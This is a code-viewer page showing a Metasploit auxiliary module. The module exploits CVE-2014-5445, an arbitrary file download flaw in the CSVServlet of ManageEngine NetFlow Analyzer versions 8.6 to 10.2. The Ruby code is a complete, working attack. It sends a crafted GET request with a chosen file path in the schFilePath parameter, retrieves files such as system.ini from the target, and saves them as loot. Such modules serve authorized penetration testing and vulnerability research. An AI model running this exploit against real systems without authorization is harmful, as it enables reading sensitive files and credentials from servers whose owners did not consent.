Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/netflow_file_download.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Report

8
  include Msf::Exploit::Remote::HttpClient

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',

15
        'Description' => %q{

16
          This module exploits an arbitrary file download vulnerability in CSVServlet

17
          on ManageEngine NetFlow Analyzer. This module has been tested on both Windows

18
          and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you

19
          must escape the backslash with a backslash.

20
        },

21
        'Author' => [

22
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2014-5445' ],

27
          [ 'OSVDB', '115340' ],

28
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],

29
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]

30
        ],

31
        'DisclosureDate' => '2014-11-30',

32
        'Notes' => {

33
          'Stability' => [CRASH_SAFE],

34
          'SideEffects' => [IOC_IN_LOGS],

35
          'Reliability' => []

36
        }

37
      )

38
    )

39


40
    register_options(

41
      [

42
        Opt::RPORT(8080),

43
        OptString.new('TARGETURI',

44
                      [ true, 'The base path to NetFlow Analyzer', '/netflow' ]),

45
        OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),

46
      ]

47
    )

48
  end

49


50
  def run

51
    # Create request

52
    begin

53
      print_status("Downloading file #{datastore['FILEPATH']}")

54
      res = send_request_cgi({

55
        'method' => 'GET',

56
        'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),

57
        'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }

58
      })

59
    rescue Rex::ConnectionError

60
      print_error('Could not connect.')

61
      return

62
    end

63


64
    # Show data if needed

65
    if res && res.code == 200

66
      if res.body.to_s.bytesize == 0

67
        print_error('0 bytes returned, file does not exist or it is empty.')

68
        return

69
      end

70
      vprint_line(res.body.to_s)

71
      fname = File.basename(datastore['FILEPATH'])

72


73
      path = store_loot(

74
        'netflow.http',

75
        'application/octet-stream',

76
        datastore['RHOST'],

77
        res.body,

78
        fname

79
      )

80
      print_good("File saved in: #{path}")

81
    else

82
      print_error('Failed to download file.')

83
    end

84
  end

85
end

86


87